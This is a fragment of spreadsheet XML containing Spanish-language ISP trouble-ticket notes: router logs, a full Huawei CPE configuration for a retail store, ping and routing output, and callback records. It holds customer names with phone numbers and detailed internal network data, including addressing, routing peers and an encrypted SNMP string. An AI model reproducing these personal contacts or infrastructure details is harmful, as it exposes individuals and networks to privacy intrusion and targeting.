JUN  6 2022 19:46:06+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[119]:FAILED TO LOGIN. (IP=142.93.204.250, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 19:46:04+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[120]:LAST MESSAGE REPEATED 14 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JUN  6 2022 19:45:46+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[121]:FAILED TO LOGIN. (IP=142.93.204.250, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 19:45:34+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[122]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JUN  6 2022 19:45:30+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[123]:FAILED TO LOGIN. (IP=142.93.204.250, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LI</t>
  </si>
  <si>
    <t>F4593653</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRAULIO ALMENGOR 69860993 ENVIA A BUZON
-ID 2001143671</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRAULIO ALMENGOR 69860993 ENVIA A BUZON
-ID 2001059090</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRAULIO ALMENGOR 69860993 ENVIA DIRECTO A BUZON, SE INTENTARA LUEGO
-ID 1001945946</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  BRAULIO ALMENGOR 69860993 SIGUE SIN RESPONDER, SE INTENTARA LUEGO
-ID 2001068329</t>
  </si>
  <si>
    <t>SE LLAMA A BRAULIO ALMENGOR 69860993 NO RESPONDE
-ID 2001161376</t>
  </si>
  <si>
    <t>F4593659</t>
  </si>
  <si>
    <t xml:space="preserve">SE VALIDA A NIVEL DE SW SE4 ENCUENTRA UP SE PROCEDE A  DEJAR EL TTK  EN PENDIENTE CLIENTE POR ENERGIA GENERAL
PING -Q -C 100 -S 100 -M 5 -VPN ADMIN_CISCO_ISLAS 10.72.4.23
  PING 10.72.4.23: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.72.4.23 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/2/8 MS
RUTA IP:
PE: 10.179.28.75
DISPLAY IP ROUTING-TABLE VPN-INSTANCE ADMIN_CISCO_ISLAS 10.72.4.23
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : ADMIN_CISCO_ISLAS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
     10.72.4.23/32  DIRECT  0    0                 0.0.0.0         VLANIF189			</t>
  </si>
  <si>
    <t>F4593669</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SE PROCEDE CON CIERRE POR ENERGIA COMERCIAL .
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 0 HORAS Y 5 MINUTOS)
HUAWEI VERSATILE ROUTING PLATFORM SOFTWARE
VRP (R) SOFTWARE, VERSION 5.170 (AR120 V200R009C00SPC500)
COPYRIGHT (C) 2011-2018 HUAWEI TECH CO., LTD
HUAWEI AR129CGVW-L ROUTER UPTIME IS 0 WEEK, 0 DAY, 0 HOUR, 6 MINUTES
MPU 0(MASTER) : UPTIME IS 0 WEEK, 0 DAY, 0 HOUR, 5 MINUTES
SDRAM MEMORY SIZE    : 512     M BYTES
FLASH 0 MEMORY SIZE  : 512     M BYTES
MPU VERSION INFORMATION :
1. PCB      VERSION  : AR129CGVW-L VER.C
2. MAB      VERSION  : 0
3. BOARD    TYPE     : AR129CGVW-L
4. BOOTROM  VERSION  : 1
&lt;CC_WALMART_CR_TIENDA_3109&gt;
CONFIGURACION DEL CPE:
DISPLAY  CURRENT-CONFIGURATION
[V200R009C00SPC500]
#
 SYSNAME CC_WALMART_CR_TIENDA_3109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2.180 0.0.0.3
 RULE 2 PERMIT SOURCE 172.18.54.0 0.0.0.255
#
ACL NAME TELNET 3999
 RULE 10 PERMIT IP SOURCE 10.0.0.0 0.255.255.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ETHERNET0/0/0
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/0
 UNDO PORTSWITCH
 DESCRIPTION WAN_PRINCIPAL_CONTR0001504372OC
#
INTERFACE GIGABITETHERNET0/0/0.1108
 DESCRIPTION WAN_PUNTO_VENTA_HACIA_MTR105
 SET FLOW-STAT INTERVAL 30
 BANDWIDTH 2
 DOT1Q TERMINATION VID 1108
 IP ADDRESS 10.201.11.242 255.255.255.192
#
INTERFACE GIGABITETHERNET0/0/0.1114
 DESCRIPTION WAN_SEGURIDAD_CONTR0001504373OC
 SET FLOW-STAT INTERVAL 30
 BANDWIDTH 3072
 DOT1Q TERMINATION VID 1114
#
INTERFACE GIGABITETHERNET0/0/0.2108
 DESCRIPTION WAN_PUNTO_VENTA_HACIA_MTR488
 DOT1Q TERMINATION VID 2108
 IP ADDRESS 10.201.41.242 255.255.255.192
#
INTERFACE GIGABITETHERNET0/0/1
 UNDO PORTSWITCH
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 22.32.2.181 255.255.255.252
 OSPF NETWORK-TYPE P2P
 OSPF TIMER DEAD 60
#
INTERFACE GIGABITETHERNET0/0/2
 DESCRIPTION LIBRE
 SHUTDOWN
 PORT LINK-TYPE ACCESS
#
INTERFACE GIGABITETHERNET0/0/3
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/4
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/5
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE WLAN-BSS7
 DESCRIPTION LIBRE
 PORT HYBRID TAGGED VLAN 1
#
INTERFACE CELLULAR0/0/0
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE NULL0
 DESCRIPTION LIBRE
#
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.99.77.53 255.255.255.255
#
BGP 64529
 ROUTER-ID 10.99.77.53
 PEER 10.201.11.193 AS-NUMBER 14754
 PEER 10.201.41.193 AS-NUMBER 14754
 #
 IPV4-FAMILY UNICAST
  UNDO SYNCHRONIZATION
  NETWORK 10.99.77.53 255.255.255.255
  IMPORT-ROUTE OSPF 65410
  PEER 10.201.11.193 ENABLE
  PEER 10.201.11.193 ROUTE-POLICY LOCAL_PREFERENCE IMPORT
  PEER 10.201.11.193 ROUTE-POLICY LOCAL_PREFERENCE EXPORT
  PEER 10.201.11.193 NEXT-HOP-LOCAL
  PEER 10.201.41.193 ENABLE
  PEER 10.201.41.193 NEXT-HOP-LOCAL
#
OSPF 65410
 DEFAULT-ROUTE-ADVERTISE
 IMPORT-ROUTE DIRECT
 AREA 0.0.0.0
  NETWORK 22.32.2.180 0.0.0.3
#
ROUTE-POLICY OSPF_DATOS_WALMART PERMIT NODE 10
 IF-MATCH ACL 2999
#
ROUTE-POLICY LOCAL_PREFERENCE PERMIT NODE 10
 APPLY LOCAL-PREFERENCE 200
#
 SNMP-AGENT LOCAL-ENGINEID 800007DB0340EEDDF2B518
 SNMP-AGENT COMMUNITY READ %^%#0A/6"RPROAW/H:SH!7PP1VW6-R!O!J)W^:*5:!{DTWM&amp;HPMN%DPV[O!T"XA5`_=&lt;LTIUT~RGQY)2XK1)%^%# ACL 2988
 SNMP-AGENT SYS-INFO LOCATION PALI PARRITA PUNTO DE VENTA
 SNMP-AGENT SYS-INFO VERSION V2C
 SNMP-AGENT TRAP SOURCE LOOPBACK5
 SNMP-AGENT
#
 STELNET SERVER ENABLE
 TELNET SERVER ENABLE
#
 SET WEB LOGIN-STYLE SIMPLE
 HTTP SECURE-SERVER SSL-POLICY DEFAULT_POLICY
 HTTP SERVER ENABLE
 HTTP SECURE-SERVER ENABLE
#
FIB REGULARLY-REFRESH DIS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RADIO-PROFILE ID 0
#
INTERFACE WLAN-RADIO0/0/1
 DESCRIPTION LIBRE
#
DOT1X-ACCESS-PROFILE NAME DOT1X_ACCESS_PROFILE
#
MAC-ACCESS-PROFILE NAME MAC_ACCESS_PROFILE
#
 NTP-SERVICE UNICAST-PEER 10.201.41.193
 NTP-SERVICE UNICAST-PEER 10.201.11.193
#
VOICE
 #
 DIAGNOSE
#
OPS
#
AUTOSTART
#
SECELOG
#
RETURN
&lt;CC_WALMART_CR_TIENDA_3109&gt;
LOG DEL ROUTER CPE:
DISPLAY LOGBUFFER
LOGGING BUFFER CONFIGURATION AND CONTENTS: ENABLED
ALLOWED MAX BUFFER SIZE: 1024
ACTUAL BUFFER SIZE: 512
CHANNEL NUMBER: 4, CHANNEL NAME: LOGBUFFER
DROPPED MESSAGES: 0
OVERWRITTEN MESSAGES: 0
CURRENT MESSAGES: 32
JUN  7 2022 22:56:07-06:00 CC_WALMART_CR_TIENDA_3109 %%01NTP/4/PEER_SELE(L)[0]:THE PEER SELECTED BY THE SYSTEM IS 10.201.41.193.
JUN  7 2022 22:53:02-06:00 CC_WALMART_CR_TIENDA_3109 %%01OSPF/4/NBR_CHANGE_E(L)[1]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.2.182, NEIGHBOREVENT=LOADINGDONE, NEIGHBORPREVIOUSSTATE=LOADING, NEIGHBORCURRENTSTATE=FULL)
JUN  7 2022 22:53:02-06:00 CC_WALMART_CR_TIENDA_3109 %%01OSPF/4/NBR_CHANGE_E(L)[2]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.2.182, NEIGHBOREVENT=EXCHANGEDONE, NEIGHBORPREVIOUSSTATE=EXCHANGE, NEIGHBORCURRENTSTATE=LOADING)
JUN  7 2022 22:53:01-06:00 CC_WALMART_CR_TIENDA_3109 %%01OSPF/4/NBR_CHANGE_E(L)[3]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.2.182, NEIGHBOREVENT=NEGOTIATIONDONE, NEIGHBORPREVIOUSSTATE=EXSTART, NEIGHBORCURRENTSTATE=EXCHANGE)
JUN  7 2022 22:53:01-06:00 CC_WALMART_CR_TIENDA_3109 %%01OSPF/4/NBR_CHANGE_E(L)[4]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.2.182, NEIGHBOREVENT=2WAYRECEIVED, NEIGHBORPREVIOUSSTATE=INIT, NEIGHBORCURRENTSTATE=EXSTART)
JUN  7 2022 22:53:01-06:00 CC_WALMART_CR_TIENDA_3109 %%01OSPF/4/NBR_CHANGE_E(L)[5]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.2.182, NEIGHBOREVENT=HELLORECEIVED, NEIGHBORPREVIOUSSTATE=DOWN, NEIGHBORCURRENTSTATE=INIT)
JUN  7 2022 22:52:53-06:00 CC_WALMART_CR_TIENDA_3109 %%01RM/4/IPV4_DEFT_RT_CHG(L)[6]:IPV4 DEFAULT ROUTE IS CHANGED. (CHANGETYPE=ADD, INSTANCEID=0, PROTOCOL=BGP, EXITIF=GIGABITETHERNET0/0/0.1108, NEXTHOP=10.201.11.193, NEIGHBOUR=10.201.11.193, PREFERENCE=255, LABEL=NULL, METRIC=0)
JUN  7 2022 22:52:52-06:00 CC_WALMART_CR_TIENDA_3109 %%01BGP/3/STATE_CHG_UPDOWN(L)[7]:THE STATUS OF THE PEER 10.201.11.193 CHANGED FROM OPENCONFIRM TO ESTABLISHED. (INSTANCENAME=PUBLIC, STATECHANGEREASON=UP)
JUN  7 2022 22:52:51-06:00 CC_WALMART_CR_TIENDA_3109 %%01BGP/3/STATE_CHG_UPDOWN(L)[8]:THE STATUS OF THE PEER 10.201.41.193 CHANGED FROM OPENCONFIRM TO ESTABLISHED. (INSTANCENAME=PUBLIC, STATECHANGEREASON=UP)
JUN  7 2022 22:52:46-06:00 CC_WALMART_CR_TIENDA_3109 %%01IFPDT/4/DRVICOUTSTR(L)[9]:3G/LTE MODULE ON CELLULAR0/0/0 HAS BEEN INITIALIZED SUCCESSFULLY.
JUN  7 2022 22:52:46-06:00 CC_WALMART_CR_TIENDA_3109 %%01IFPDT/4/DRVICOUTSTR(L)[10]:3G/LTE MODULE ON CELLULAR0/0/0 IS INITIALIZING, WAITING PLEASE...
JUN  7 2022 22:52:41-06:00 CC_WALMART_CR_TIENDA_3109 %%01NTP/4/PEER_SELE(L)[11]:THE PEER SELECTED BY THE SYSTEM IS 10.201.11.193.
JUN  7 2022 22:52:41-06:00 CC_WALMART_CR_TIENDA_3109 %%01NTP/4/STRATUM_CHANGE(L)[12]:SYSTEM STRATUM CHANGES FROM 16 TO 4 AFTER CLOCK UPDATE.
JUN  7 2022 22:52:41-06:00 CC_WALMART_CR_TIENDA_3109 %%01NTP/4/LEAP_CHANGE(L)[13]:SYSTEM LEAP CHANGES FROM 3 TO 0 AFTER CLOCK UPDATE.
JUN  7 2022 17:40:22-06:00 CC_WALMART_CR_TIENDA_3109 %%01NTP/4/PEER_SELE(L)[14]:THE PEER SELECTED BY THE SYSTEM IS 10.201.11.193.
JUN  7 2022 17:40:21-06:00 CC_WALMART_CR_TIENDA_3109 %%01DEV/4/ENTUP(L)[15]:AR129CGVW-L BOARD[0] REGISTER SUCCESS.
JUN  7 2022 17:40:15-06:00 CC_WALMART_CR_TIENDA_3109 %%01IFNET/4/LINK_STATE(L)[16]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/1 HAS ENTERED THE UP STATE.
JUN  7 2022 17:40:15-06:00 CC_WALMART_CR_TIENDA_3109 %%01IFPDT/4/IF_STATE(L)[17]:INTERFACE GIGABITETHERNET0/0/1 HAS TURNED INTO UP STATE.
JUN  7 2022 17:40:14-06:00 CC_WALMART_CR_TIENDA_3109 %%01IFNET/4/LINK_STATE(L)[18]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.2108 HAS ENTERED THE UP STATE.
JUN  7 2022 17:40:13-06:00 CC_WALMART_CR_TIENDA_3109 %%01IFNET/4/LINK_STATE(L)[19]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.1108 HAS ENTERED THE UP STATE.
JUN  7 2022 17:40:13-06:00 CC_WALMART_CR_TIENDA_3109 %%01IFPDT/4/IF_STATE(L)[20]:INTERFACE GIGABITETHERNET0/0/0 HAS TURNED INTO UP STATE.
JUN  7 2022 17:40:11-06:00 CC_WALMART_CR_TIENDA_3109 %%01IFPDT/4/IF_STATE(L)[21]:INTERFACE WLAN-RADIO0/0/1 HAS TURNED INTO UP STATE.
JUN  7 2022 17:40:10-06:00 CC_WALMART_CR_TIENDA_3109 %%01IFPDT/4/IF_STATE(L)[22]:INTERFACE WLAN-RADIO0/0/0 HAS TURNED INTO UP STATE.
JUN  7 2022 17:40:03-06:00 CC_WALMART_CR_TIENDA_3109 %%01NTP/4/PEER_LOCALADDR_USED(L)[23]:NTP: NTPNEWPEER OF PSTLOCALADDR IS OK.
JUN  7 2022 17:40:03-06:00 CC_WALMART_CR_TIENDA_3109 %%01NTP/4/PEER_LOCALADDR_USEING(L)[24]:NTP: NTPNEWPEER OF PSTLOCALADDR IS USING.
JUN  7 2022 17:40:03-06:00 CC_WALMART_CR_TIENDA_3109 %%01NTP/4/PEER_LOCALADDR_USED(L)[25]:NTP: NTPNEWPEER OF PSTLOCALADDR IS OK.
JUN  7 2022 17:40:03-06:00 CC_WALMART_CR_TIENDA_3109 %%01NTP/4/PEER_LOCALADDR_USEING(L)[26]:NTP: NTPNEWPEER OF PSTLOCALADDR IS USING.
JUN  7 2022 17:39:59-06:00 CC_WALMART_CR_TIENDA_3109 %%01RM/4/ROUTERID_CHANGE(L)[27]:THE ROUTER ID IS 10.201.11.242. (INSTANCEID=0)
JUN  7 2022 17:39:53-06:00 CC_WALMART_CR_TIENDA_3109 %%01IFNET/4/LINK_STATE(L)[28]:THE LINE PROTOCOL IP ON THE INTERFACE LOOPBACK5 HAS ENTERED THE UP STATE.
JUN  7 2022 17:39:52-06:00 CC_WALMART_CR_TIENDA_3109 %%01IFPDT/4/IF_STATE(L)[29]:INTERFACE WLAN-BSS7 HAS TURNED INTO UP STATE.
JUN  7 2022 23:39:16+00:00 CC_WALMART_CR_TIENDA_3109 %%01IFPDT/4/DRVICOUTSTR(L)[30]:3G/LTE MODULE ON CELLULAR0/0/0 IS INSERTED!
JUN  7 2022 23:38:28+00:00 CC_WALMART_CR_TIENDA_3109 %%01GTL/4/STATECHANGED(L)[31]:LICENSE STATE CHANGED FROM NULL TO DEFAULT.
&lt;CC_WALMART_CR_TIENDA_3109&gt;
DISPLAY CLOCK
2022-06-07 22:58:20
TUESDAY
TIME ZONE(GMT) : UTC-06:00
&lt;CC_WALMART_CR_TIENDA_3109&gt;
TABLA ARP DEL ROUTER CPE:
DISPLAY ARP
IP ADDRESS      MAC ADDRESS     EXPIRE(M) TYPE        INTERFACE   VPN-INSTANCE
                                    VLAN/CEVLAN(SIP/DIP)      PVC
------------------------------------------------------------------------------
22.32.2.181     40EE-DD76-1542            I -         GE0/0/1
22.32.2.182     0025-8434-13C6  15        D-0         GE0/0/1
10.201.11.242   40EE-DD76-1541            I -         GE0/0/0.1108
10.201.11.193   505D-AC64-7F7C  20        D-0         GE0/0/0.1108
                                          1108/-
10.201.41.242   40EE-DD76-1541            I -         GE0/0/0.2108
10.201.41.193   F4DE-AF06-70A8  15        D-0         GE0/0/0.2108
                                          2108/-
------------------------------------------------------------------------------
TOTAL:6         DYNAMIC:3       STATIC:0     INTERFACE:3
&lt;CC_WALMART_CR_TIENDA_3109&gt;
INTERFACES DEL ROUTER:
DISPLAY INT DESC
PHY: PHYSICAL
*DOWN: ADMINISTRATIVELY DOWN
(L): LOOPBACK
(S): SPOOFING
(B): BFD DOWN
^DOWN: STANDBY
(E): ETHOAM DOWN
(V): VIRTUALPORT
INTERFACE                     PHY     PROTOCOL DESCRIPTION
CELL0/0/0                     *DOWN   DOWN     LIBRE
ETH0/0/0                      *DOWN   DOWN     LIBRE
GE0/0/0                       UP      DOWN     WAN_PRINCIPAL_CONTR0001504372OC
GE0/0/0.1108                  UP      UP       WAN_PUNTO_VENTA_HACIA_MTR105
GE0/0/0.1114                  UP      DOWN     WAN_SEGURIDAD_CONTR0001504373OC
GE0/0/0.2108                  UP      UP       WAN_PUNTO_VENTA_HACIA_MTR488
GE0/0/1                       UP      UP       LAN DEL CLIENTE
GE0/0/2                       *DOWN   DOWN     LIBRE
GE0/0/3                       *DOWN   DOWN     LIBRE
GE0/0/4                       *DOWN   DOWN     LIBRE
GE0/0/5(V)                    *DOWN   DOWN     LIBRE
LOOP5                         UP      UP(S)    MONITOREO DEL CNOC
NULL0                         UP      UP(S)    LIBRE
WLAN-BSS7                     UP      UP       LIBRE
WLAN0/0/0                     UP      UP       LIBRE
WLAN0/0/1                     UP      UP       LIBRE
&lt;CC_WALMART_CR_TIENDA_3109&gt;
DISPLAY  IP INT BRIEF
*DOWN: ADMINISTRATIVELY DOWN
^DOWN: STANDBY
(L): LOOPBACK
(S): SPOOFING
(E): E-TRUNK DOWN
THE NUMBER OF INTERFACE THAT IS UP IN PHYSICAL IS 7
THE NUMBER OF INTERFACE THAT IS DOWN IN PHYSICAL IS 4
THE NUMBER OF INTERFACE THAT IS UP IN PROTOCOL IS 5
THE NUMBER OF INTERFACE THAT IS DOWN IN PROTOCOL IS 6
INTERFACE                         IP ADDRESS/MASK      PHYSICAL   PROTOCOL
CELLULAR0/0/0                     UNASSIGNED           *DOWN      DOWN
ETHERNET0/0/0                     UNASSIGNED           *DOWN      DOWN
GIGABITETHERNET0/0/0              UNASSIGNED           UP         DOWN
GIGABITETHERNET0/0/0.1108         10.201.11.242/26     UP         UP
GIGABITETHERNET0/0/0.1114         UNASSIGNED           UP         DOWN
GIGABITETHERNET0/0/0.2108         10.201.41.242/26     UP         UP
GIGABITETHERNET0/0/1              22.32.2.181/30       UP         UP
GIGABITETHERNET0/0/4              UNASSIGNED           *DOWN      DOWN
GIGABITETHERNET0/0/5              UNASSIGNED           *DOWN      DOWN
LOOPBACK5                         10.99.77.53/32       UP         UP(S)
NULL0                             UNASSIGNED           UP         UP(S)
&lt;CC_WALMART_CR_TIENDA_3109&gt;
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN DATOS_WALMART 10.201.11.242
  PING 10.201.11.242: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.201.11.242 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 2/2/3 MS
RUTA IP:
PE: 10.179.36.6
DISPLAY IP ROUTING-TABLE VPN-INSTANCE DATOS_WALMART 10.201.11.242
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : DATOS_WALMART
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.201.11.192/26  DIRECT  0    0             D   10.201.11.193   GIGABITETHERNET4/0/1.1108			</t>
  </si>
  <si>
    <t>F4593677</t>
  </si>
  <si>
    <t>ENLACE CAIDO SE PROCEDEE A DEJAR EN PENDENTE CLIENTE POR ENERGIA COMERCIAL
&lt;RTLHGTRUN1D2C02B03EIM1&gt;PIN -VPN-INSTANCE  INTERNET_GT_DEPTAL 10.105.1.43         PING 10.105.1.43: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
  --- 10.105.1.43 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
&lt;RTLHGTRUN1D2C02B03EIM1&gt;
PE
10.179.28.55
&lt;RTLHGTRUN1D2C02B03EIM1&gt;DISPLAY  IP ROUTING-TABLE  VPN-INSTANCE  INTERNET_GT_DEPTAL 10.105.1.43
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_DEPTAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.105.1.32/27  DIRECT  0    0             D   10.105.1.33     VLANIF3750
&lt;RTLHGTRUN1D2C02B03EIM1&gt;DIS CUR INTER  VLANIF3750
#
INTERFACE VLANIF3750
 DESCRIPTION INTERNET_GT_DEPTAL
 SET FLOW-STAT INTERVAL 30
 IP BINDING VPN-INSTANCE INTERNET_GT_DEPTAL
 IP ADDRESS 10.72.98.205 255.255.255.252
 IP ADDRESS 10.72.85.181 255.255.255.252 SUB
 IP ADDRESS 10.72.191.5 255.255.255.252 SUB
 IP ADDRESS 10.72.191.73 255.255.255.248 SUB
 IP ADDRESS 10.72.191.221 255.255.255.252 SUB
 IP ADDRESS 10.78.92.113 255.255.255.248 SUB
 IP ADDRESS 10.78.92.121 255.255.255.248 SUB
 IP ADDRESS 10.78.92.145 255.255.255.248 SUB
 IP ADDRESS 10.78.92.153 255.255.255.248 SUB
 IP ADDRESS 10.78.92.169 255.255.255.248 SUB
 IP ADDRESS 10.78.92.185 255.255.255.248 SUB
 IP ADDRESS 10.78.92.197 255.255.255.252 SUB
 IP ADDRESS 10.78.92.201 255.255.255.252 SUB
 IP ADDRESS 10.78.92.209 255.255.255.252 SUB
 IP ADDRESS 10.78.92.213 255.255.255.252 SUB
 IP ADDRESS 10.78.92.217 255.255.255.252 SUB
 IP ADDRESS 10.78.92.221 255.255.255.252 SUB
 IP ADDRESS 10.78.92.225 255.255.255.252 SUB
 IP ADDRESS 10.78.92.229 255.255.255.252 SUB
 IP ADDRESS 10.78.92.233 255.255.255.252 SUB
 IP ADDRESS 10.78.92.241 255.255.255.252 SUB
 IP ADDRESS 10.78.92.245 255.255.255.252 SUB
 IP ADDRESS 10.87.130.49 255.255.255.248 SUB
 IP ADDRESS 10.87.130.81 255.255.255.248 SUB
 IP ADDRESS 10.87.130.121 255.255.255.248 SUB
 IP ADDRESS 10.87.130.229 255.255.255.252 SUB
 IP ADDRESS 10.87.130.233 255.255.255.248 SUB
 IP ADDRESS 10.87.184.33 255.255.255.224 SUB
 IP ADDRESS 10.87.184.129 255.255.255.240 SUB
 IP ADDRESS 10.87.184.249 255.255.255.248 SUB
 IP ADDRESS 10.87.200.97 255.255.255.224 SUB
 IP ADDRESS 10.87.200.233 255.255.255.252 SUB
 IP ADDRESS 10.105.1.1 255.255.255.224 SUB
 IP ADDRESS 10.105.1.33 255.255.255.224 SUB
 UNDO ICMP NAME NET-UNREACHABLE SEND
 UNDO ICMP NAME HOST-UNREACHABLE RECEIVE
 UNDO ICMP NAME PROTOCOL-UNREACHABLE RECEIVE
 UNDO ICMP NAME PORT-UNREACHABLE SEND
#
RETURN</t>
  </si>
  <si>
    <t>F4593678</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO NO SE TIENE GESTION DEL CPE PERO SE ENCUENTRA UP .
NO SE TIENE GESTION DEL CPE
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN SCOTIA_AGENCIAS 10.130.91.166
  PING 10.130.91.166: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.130.91.166 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.30.32
DISPLAY IP ROUTING-TABLE VPN-INSTANCE SCOTIA_AGENCIAS 10.130.91.166
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : SCOTIA_AGENCIAS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.130.91.166/32  DIRECT  0    0                 0.0.0.0         VLANIF1616			</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARIO ALVARENGA AL 2509-3203 NO RESPONDE | SE INTENTARA LUEGO **
ID 1001901676
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARIO ALVARENGA AL 2509-3203 NO RESPONDE | SE INTENTARA LUEGO **
ID 1001915025
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARIO ALVARENGA AL 2509-3203 SIGUE SIN  RESPONDER | SE INTENTARA LUEGO **
ID 1001936893
**</t>
  </si>
  <si>
    <t>SE LOGRA ACCEDER AL CPE DEL CLIENTE EL CUAL SE VALIDA QUE TIENE UNAS ALARMAS  SE PEOCEDE A VALIDAR  Y UN ARANQIE EN FRIO HACE 3 HORAS
SE VALIDARA CON EL CLIENTE.
000101: JUN  7 20:02:51.057 ELS: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE TUNNEL31, CHANGED STATE TO DOWN
000102: JUN  7 20:02:51.057 ELS: %LINK-5-CHANGED: INTERFACE TUNNEL31, CHANGED STATE TO ADMINISTRATIVELY DOWN
000103: JUN  7 20:02:57.361 ELS: %LINK-5-CHANGED: INTERFACE TUNNEL40, CHANGED STATE TO ADMINISTRATIVELY DOWN
000104: JUN  7 20:03:02.413 ELS: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY MA50827 ON CONSOLE
000105: JUN  7 20:03:02.417 ELS: %LINK-5-CHANGED: INTERFACE TUNNEL41, CHANGED STATE TO ADMINISTRATIVELY DOWN
000106: JUN  7 20:11:00.676 ELS: NTP CORE (INFO): 10.23.240.254 8663 83 UNREACHABLE
000107: JUN  7 20:11:00.676 ELS: NTP CORE (INFO): 0.0.0.0 C64C 0C CLOCK_STEP
000108: JUN  7 20:11:00.676 ELS: NTP CORE (NOTICE): CLOCK SYNCHRONIZATION LOST.
000109: .JUN  7 23:32:41.187 ELS: %SSH-4-SSH2_UNEXPECTED_MSG: UNEXPECTED MESSAGE TYPE HAS ARRIVED. TERMINATING THE CONNECTION FROM 10.130.91.161
